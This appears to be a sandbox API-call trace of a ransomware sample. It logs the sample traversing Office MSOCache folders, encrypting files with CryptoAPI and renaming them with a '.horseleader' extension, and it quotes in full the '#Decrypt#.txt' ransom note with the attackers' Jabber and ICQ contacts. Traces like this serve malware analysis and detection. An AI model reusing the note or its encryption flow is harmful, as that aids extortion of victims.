[0133.225] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25ee00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.225] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0133.227] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.228] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0133.228] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.228] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0133.228] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0133.229] CloseHandle (hObject=0x21c) returned 1 [0133.562] GetProcessHeap () returned 0x780000 [0133.562] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b49c8 [0133.562] wnsprintfW (in: pszDest=0x7b49c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.horseleader") returned 91 [0133.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.horseleader")) returned 1 [0133.563] GetProcessHeap () returned 0x780000 [0133.563] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b49c8 | out: hHeap=0x780000) returned 1 [0133.563] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1 [0133.564] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="Windows") returned -1 [0133.564] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0133.564] StrStrIW (lpFirst="ExcelMUI.xml", lpSrch=".horseleader") returned 0x0 [0133.564] lstrcmpW (lpString1="ExcelMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0133.564] lstrcmpW (lpString1="ExcelMUI.xml", lpString2="_uninstalling_.png") returned 1 [0133.564] lstrlenW (lpString=".testttjffg") returned 11 [0133.564] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".testttjffg") returned 0x0 [0133.564] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0133.565] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0133.565] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0133.565] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0133.565] StrStrW (lpFirst="ExcelMUI.xml", lpSrch=".txt") returned 0x0 [0133.566] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1565) returned 1 [0133.566] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x61d, lpOverlapped=0x0) returned 1 [0133.568] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff9e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.568] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x61d, lpOverlapped=0x0) returned 1 [0133.568] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.569] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0133.569] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0133.569] CloseHandle (hObject=0x21c) returned 1 [0133.571] GetProcessHeap () returned 0x780000 [0133.571] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b49c8 [0133.571] wnsprintfW (in: pszDest=0x7b49c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.horseleader") returned 91 [0133.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.horseleader")) returned 1 [0133.572] GetProcessHeap () returned 0x780000 [0133.573] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b49c8 | out: hHeap=0x780000) returned 1 [0133.573] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0133.573] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0133.573] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0133.573] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0133.573] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0133.573] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0133.573] lstrlenW (lpString=".testttjffg") returned 11 [0133.573] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0133.574] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0133.574] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0133.574] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0133.575] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0133.575] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0133.575] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2296) returned 1 [0133.576] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x8f8, lpOverlapped=0x0) returned 1 [0133.578] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.578] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x8f8, lpOverlapped=0x0) returned 1 [0133.578] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.578] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0133.579] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0133.579] CloseHandle (hObject=0x21c) returned 1 [0133.592] GetProcessHeap () returned 0x780000 [0133.592] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b49c8 [0133.592] wnsprintfW (in: pszDest=0x7b49c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0133.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0133.593] GetProcessHeap () returned 0x780000 [0133.593] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b49c8 | out: hHeap=0x780000) returned 1 [0133.593] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0133.593] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0133.594] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0133.594] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0133.594] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0133.594] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0133.596] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0133.596] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0133.596] CloseHandle (hObject=0x1cc) returned 1 [0133.596] GetProcessHeap () returned 0x780000 [0133.596] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0133.597] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0133.597] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0133.597] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C") returned 66 [0133.597] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0133.597] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0133.597] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0133.597] GetProcessHeap () returned 0x780000 [0133.597] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0133.597] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*") returned 68 [0133.597] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0135.517] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0135.517] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\.") returned 68 [0135.517] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0135.517] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0135.518] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0135.518] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0135.518] lstrlenW (lpString=".testttjffg") returned 11 [0135.518] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0135.518] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0135.518] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0135.556] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0135.557] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0135.557] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0135.557] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\..") returned 69 [0135.557] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0135.557] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0135.557] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0135.557] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0135.557] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0135.557] lstrlenW (lpString=".testttjffg") returned 11 [0135.558] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0135.558] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0135.658] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0135.659] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0135.659] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0135.659] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="Windows") returned -1 [0135.659] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0135.659] StrStrIW (lpFirst="PowerPointMUI.msi", lpSrch=".horseleader") returned 0x0 [0135.659] lstrcmpW (lpString1="PowerPointMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0135.660] lstrcmpW (lpString1="PowerPointMUI.msi", lpString2="_uninstalling_.png") returned 1 [0135.660] lstrlenW (lpString=".testttjffg") returned 11 [0135.660] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpSrch=".testttjffg") returned 0x0 [0135.660] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0135.716] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0135.716] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0135.716] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0135.716] StrStrW (lpFirst="PowerPointMUI.msi", lpSrch=".txt") returned 0x0 [0135.717] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2503680) returned 1 [0135.717] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.717] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, 